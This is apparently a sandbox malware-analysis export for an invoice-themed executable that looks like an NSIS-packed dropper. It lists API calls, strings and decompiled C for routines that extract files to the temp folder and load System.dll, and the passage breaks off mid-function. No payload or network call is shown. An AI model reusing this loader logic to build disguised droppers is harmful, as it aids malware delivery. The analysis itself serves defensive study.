0x00000000
0x00000000
0x00000000
0x00000000
0x00402d00
0x00402d00
0x00402d05
0x00402d09
0x00402d10
0x00402d17
0x00402d19
0x00402d19
0x00402d21
0x00402d28
0x00402e87
0x00402ec9
0x00000000
0x00402ec9
0x00402d34
0x00402db8
0x00402dbb
0x00402dc0
0x00000000
0x00402db8
0x00402d41
0x00402d46
0x00402d4e
0x00402d74
0x00402d7a
0x00402d83
0x00402d89
0x00402d8e
0x00402d94
0x00000000
0x00000000
0x00402d9e
0x00402da6
0x00402da9
0x00402dae
0x00402db0
0x00402db0
0x00000000
0x00000000
0x00000000
0x00000000
0x00402d9e
0x00402dc1
0x00402dc7
0x00402dd7
0x00402dd7
0x00402dda
0x00402de0
0x00402de2
0x00000000
0x00402d00

APIs

GetTickCount.KERNEL32 ref: 00402C86
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe,00000400), ref: 00402CA2

Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe,80000000,00000003), ref: 00405841
Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe,C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe,80000000,00000003), ref: 00402CEB
GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E32

Strings

C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, xrefs: 00402C8C, 00402C9B, 00402CAF, 00402CCC
Inst, xrefs: 00402D59
Null, xrefs: 00402D6B
C:\Users\user\Desktop, xrefs: 00402CCD, 00402CD2, 00402CD8
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C72, 00402E4A
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B
"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" , xrefs: 00402C7F
Error launching installer, xrefs: 00402CC2
soft, xrefs: 00402D62
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2569794216
Opcode ID: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
Opcode Fuzzy Hash: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405659(E00405B66(0x409b70, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b70);
					E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E61(0x409b70);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F04(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t75, 0x40a370, 0x409b70, "C:\Users\jones\AppData\Local\Temp\nsp24F7.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t62 = E00405427("C:\Users\jones\AppData\Local\Temp\nsp24F7.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F04(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F18(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffe9);
						lstrcatA(0x409b70,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x0040265c
0x0040265c
0x0040288b
0x0040288e
0x0040288e
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x00402894
0x00402894
0x00402894
0x00401833
0x00401833
0x00401834
0x00401492
0x0040220e
0x0040220e
0x0040220e
0x00401831
0x0040182a
0x00402896
0x0040289a
0x0040289a
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x00402209
0x00000000
0x00402209
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73

Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0

Strings

Call, xrefs: 00401750, 00401759, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll, xrefs: 00401801, 0040181D
C:\Users\user\AppData\Local\Temp, xrefs: 00401761
C:\Users\user\AppData\Local\Temp\nsp24F7.tmp, xrefs: 0040177E, 004017ED, 0040180B

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsp24F7.tmp$C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll$Call
API String ID: 1941528284-2460059478
Opcode ID: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
Opcode Fuzzy Hash: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f1d
0x00402f27
0x00402f30
0x00402f34
0x00402f3f
0x00402f3f
0x00402f47
0x00402f49
0x00402f50
0x00402f6c
0x00402f70
0x00403039
0x00403039
0x00000000
0x00402f7f
0x00402f82
0x00402f88
0x00402f8f
0x00402f92
0x00402f9b
0x00403008
0x0040300e
0x00403010
0x00403010
0x00403022
0x00403026
0x00000000
0x00403028
0x00403028
0x0040302b
0x00403031
0x00000000
0x00403031
0x00402f9d
0x00402fa0
0x00403034
0x00403034
0x00402fa6
0x00402fab
0x00402fab
0x00402fb3
0x00402fb5
0x00402fb5
0x00402fc6
0x00402fca
0x00000000
0x00000000
0x00402fde
0x00402fe6
0x00403004
0x0040303b
0x0040303b
0x00402fed
0x00402fed
0x00402ff0
0x00402ff3
0x00402ff6
0x00403000
0x00000000
0x00403002
0x00000000
0x00403002
0x00403000
0x00000000
0x00402fe6
0x00000000
0x00402fab
0x00402fa0
0x00402f9b
0x00402f92
0x00402f70
0x0040303c
0x00403040

APIs

SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
ReadFile.KERNELBASE(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
ReadFile.KERNELBASE(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
WriteFile.KERNELBASE(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE

Strings

@0A, xrefs: 00402FA6

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: File$Read$PointerWrite
String ID: @0A
API String ID: 2113905535-1363546919
Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417044; // 0x3e2a7
				_t37 = _t35 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					_t12 =  *0x417048; // 0x36984
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
						E00402BD3(0);
					}
					 *0x40afd8 = 0x40b040;
					 *0x40afdc = 0x8000; // executed
					_t16 = E00405F82(0x40afb8); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd8; // 0x41268b
					_t40 = _t39 - 0x40b040;
					if(_t40 == 0) {
						__eflags =  *0x40afd4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417044; // 0x3e2a7
						if(_t18 -  *0x40afb0 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afb0 =  *0x40afb0 + _t40;
						_t53 =  *0x40afd4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

0x00403047
0x00403054
0x00403067
0x0040306c
0x004031ad
0x004031af
0x00000000
0x004031b5
0x00403078
0x0040308b
0x00403091
0x00403097
0x004030a2
0x004030a2
0x004030a7
0x004030ac
0x004030b4
0x004030b6
0x004030b6
0x004030bf
0x004030c6
0x00000000
0x00000000
0x004030cc
0x004030d2
0x004030d8
0x00000000
0x004030de
0x004030e4
0x00403104
0x00403109
0x0040310e
0x00403114
0x0040311a
0x00403124
0x0040312b
0x00000000
0x00000000
0x0040312d
0x00403133
0x00403135
0x00403169
0x0040316f
0x00000000
0x00000000
0x00403171
0x00403173
0x00000000
0x00000000
0x00403175
0x00403175
0x00403188
0x00000000
0x00000000
0x00403197
0x00000000
0x00403197
0x00403145
0x0040314d
0x004031a4
0x004031aa
0x004031aa
0x00000000
0x00403155
0x00403155
0x0040315b
0x00403161
0x00000000
0x00000000
0x00000000
0x00403167
0x004031a8
0x004031a8
0x00000000
0x004031a8
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403058

Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
WriteFile.KERNELBASE(0040B040,0041268B,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
SetFilePointer.KERNELBASE(0003E2A7,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197

Strings

@0A, xrefs: 004030B8

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: @0A
API String ID: 2146148272-1363546919
Opcode ID: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
Opcode Fuzzy Hash: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f51
0x00401f51
0x00401f56
0x00401f5d
0x00402019
0x00402164
0x00402164
0x0040288b
0x0040288e
0x0040289a
0x0040289a
0x00401f6c
0x00401f76
0x00401f79
0x00401f88
0x00401f8c
0x00401f92
0x00401f96
0x00402012
0x00000000
0x00402012
0x00401f98
0x00401fa2
0x00401fa6
0x00401fea
0x00401fa8
0x00401fab
0x00401fae
0x00401fde
0x00401fb0
0x00401fb3
0x00401fbc
0x00401fbe
0x00401fbe
0x00401fbc
0x00401fae
0x00401ff2
0x00402007
0x00402007
0x00000000
0x00401ff2
0x00401f7c
0x00401f82
0x00401f86
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007

Strings

?B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: ?B
API String ID: 2987980305-117478770
Opcode ID: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
Opcode Fuzzy Hash: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
